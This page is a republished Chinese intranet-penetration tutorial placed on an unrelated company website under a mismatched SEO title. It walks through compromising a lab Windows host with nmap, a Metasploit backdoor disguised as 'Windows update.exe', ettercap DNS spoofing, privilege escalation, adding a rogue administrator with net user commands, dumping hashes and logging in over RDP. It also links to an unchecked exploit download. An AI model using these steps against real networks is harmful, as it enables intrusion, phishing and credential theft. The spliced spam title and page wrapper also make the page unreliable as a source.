歡迎光臨陜西驪山低速風(fēng)機(jī)動(dòng)力制造有限公司官網(wǎng)!

全國(guó)咨詢(xún)熱線(xiàn):

400-8888-888

公司給了內(nèi)網(wǎng)ip怎么使用_公司給了內(nèi)網(wǎng)ip怎么使用手機(jī)

所屬分類(lèi):客戶(hù)服務(wù)支持 發(fā)布日期:2024-09-25 瀏覽次數(shù):5

  本機(jī)ubuntu IP:192.168.0.3

 公司給了內(nèi)網(wǎng)ip怎么使用_公司給了內(nèi)網(wǎng)ip怎么使用手機(jī)

  虛擬機(jī)03主機(jī) IP:192.168.0.128

  公司給了內(nèi)網(wǎng)ip怎么使用我們先來(lái)模擬一下 比如我拿到了我本機(jī)192.168.0.3 這臺(tái)服務(wù)器公司給了內(nèi)網(wǎng)ip怎么使用的管理權(quán)限后 我是如何繼續(xù)滲透192.168.0.128這臺(tái)主機(jī)的首先在內(nèi)網(wǎng)滲透中最常用的就是信息收集以及端口掃描說(shuō)起端口掃描和主機(jī)信息收集 大家不得不想到了nmap

  nmap

  nmap是一個(gè)網(wǎng)絡(luò)連接端掃描軟件,用來(lái)掃描網(wǎng)上電腦開(kāi)放的網(wǎng)絡(luò)連接端。確定哪些服務(wù)運(yùn)行在哪些連接端,并且推斷計(jì)算機(jī)運(yùn)行哪個(gè)操作系統(tǒng)(這是亦稱(chēng) fingerprinting)。它是網(wǎng)絡(luò)管理員必用的軟件之一,以及用以評(píng)估網(wǎng)絡(luò)系統(tǒng)安全。

  正如大多數(shù)被用于網(wǎng)絡(luò)安全的工具,nmap 也是不少黑客及駭客(又稱(chēng)腳本小子)愛(ài)用的工具 。系統(tǒng)管理員可以利用nmap來(lái)探測(cè)工作環(huán)境中未經(jīng)批準(zhǔn)使用的服務(wù)器,但是黑客會(huì)利用nmap來(lái)搜集目標(biāo)電腦的網(wǎng)絡(luò)設(shè)定,從而計(jì)劃攻擊的方法。

  Nmap 常被跟評(píng)估系統(tǒng)漏洞軟件Nessus 混為一談。Nmap 以隱秘的手法,避開(kāi)闖入檢測(cè)系統(tǒng)的監(jiān)視,并盡可能不影響目標(biāo)系統(tǒng)的日常操作。

  Nmap 在黑客帝國(guó)(The Matrix)中,連同SSH1的32位元循環(huán)冗余校驗(yàn)漏洞,被崔妮蒂用以入侵發(fā)電站的能源管理系統(tǒng)。

  另外更多nmap相關(guān)信息 請(qǐng)到百度百科查看 太多 全搬過(guò)來(lái)的話(huà) 界面就不是特別美觀(guān)了https://baike.baidu.com/link?url=iKwQ4Q3iLG8zBo5mWA4z_GQ-vvFmqFjgi70x5PzDy0rn68KHQ5qyAZgdxv9Yf22aurOik7eAb2o2o_SYbGrKiq

  我們用nmap的Intense scan模塊 來(lái)掃描 192.168.0.128 這臺(tái)主機(jī) 是在內(nèi)網(wǎng)中 掃描端口開(kāi)放信息以及主機(jī)信息等一系列信息~ Intense scan 模塊可以滿(mǎn)足一般的掃描 如果你要掃描內(nèi)網(wǎng)主機(jī)的話(huà) nmap 192.168.0.1/24 即可 192.168.0.1 是我的路由器地址

  nmap -T4 -A -v 192.168.0.128

  這里我們不得不說(shuō)一下 nmap確實(shí)很強(qiáng)大 下面為輸出結(jié)果

  我們得知主機(jī)系統(tǒng)為 Windows2003 用戶(hù)組 版本信息 端口信息 開(kāi)放了3389當(dāng)然 nmap有很多插件 可以?huà)呙柚鳈C(jī)漏洞問(wèn)題 那個(gè)我沒(méi)找到= =

  咳咳配置Metasploit exe后門(mén)

  ps:默認(rèn)端口4444

  有的主機(jī)可以配合Metasploit溢出滲透xp 那樣直接獲取到一個(gè)cmd執(zhí)行權(quán)限 本臺(tái)主機(jī)我看了下 沒(méi)有遠(yuǎn)程溢出問(wèn)題 補(bǔ)丁都打好了。

  主機(jī)開(kāi)放3389 后 而且是在內(nèi)網(wǎng) 那么我們dns欺騙 內(nèi)網(wǎng)全部主機(jī)的dns 我們寫(xiě)一個(gè)html界面 提示你電腦存在xx漏洞 打補(bǔ)丁 后門(mén)改名字可以改為 Windows update.exe html界面越逼真越好。

  ettercap -T -i wlp2s0 -q -P dns_spoof /// ///

  下面為輸出結(jié)果參數(shù)問(wèn)題:

  -T文本模式 -i接要欺騙的適配器 -q安靜模式 -P dns_spoof調(diào)用這個(gè)插件 /// ///代表所有IP和子網(wǎng)掩碼

  對(duì)方主機(jī)打開(kāi)任何網(wǎng)站 都會(huì)成為我本機(jī)的index.html

  Linux的 index.html在/var/www/html/目錄

  直接gedit /var/www/html/index.html 即可編輯

  首先你要先進(jìn)入root狀態(tài)

  不然只能讀 不能寫(xiě)

  上面說(shuō)了 03主機(jī)是受害者 這里我假裝上當(dāng)了

  打開(kāi)了后門(mén)

  這里我們的msf上線(xiàn)了

  幫助信息

  

  首先我們先來(lái)讀取下192.168.0.128這臺(tái)主機(jī)的hash數(shù)值

  當(dāng)然 這些數(shù)值不好解密 咳咳

  有提權(quán)exp 可以直接顯示hash值 解密后的

  getsystem 獲取最高權(quán)限

  shell 進(jìn)入cmd提權(quán)

  我們成功獲取到了最高權(quán)限 進(jìn)入到了c盤(pán) Windows system32的cmd.exe直接一條命令 即可添加用戶(hù)&管理員權(quán)限

  net user xaisec xaisec /add & net localgroup administrators xaisec /add

  連接192.168.0.128 這臺(tái)主機(jī) rdesktop

  沒(méi)有rdesktop的 可以apt-get install rdesktop 安裝

  rdesktop -h 參數(shù)

  rdesktop 192.168.0.128 -u xaisec -p xaisec

 公司給了內(nèi)網(wǎng)ip怎么使用_公司給了內(nèi)網(wǎng)ip怎么使用手機(jī)

  -u 是用戶(hù)名的意思 -p是密碼

  讀取解密哈希值

  hash下

  administrator admin

  xaisec xaisec

  使用administrator登錄

  rdesktop 192.168.0.128 -u administrator -p admin

  最后 我整理了下提權(quán)exp 有的沒(méi)有測(cè)試 不清楚有沒(méi)有后門(mén)自行檢查

  鏈接: https://pan.baidu.com/s/1i56zH0T 密碼: qdhm

  作者:小愛(ài)_Joker

  來(lái)源:i春秋

  鏈接:https://bbs.ichunqiu.com/thread-20514-1-1.html

煉石信息安全培訓(xùn)春季班開(kāi)招

QQ:495066536

372806985

敬請(qǐng)持續(xù)關(guān)注……

評(píng)論列表

還沒(méi)有評(píng)論,快來(lái)說(shuō)點(diǎn)什么吧~

發(fā)表評(píng)論

真誠(chéng)期待與您的合作

獲取報(bào)價(jià)·了解更多業(yè)務(wù)·7*24小時(shí)專(zhuān)業(yè)服務(wù)

聯(lián)系我們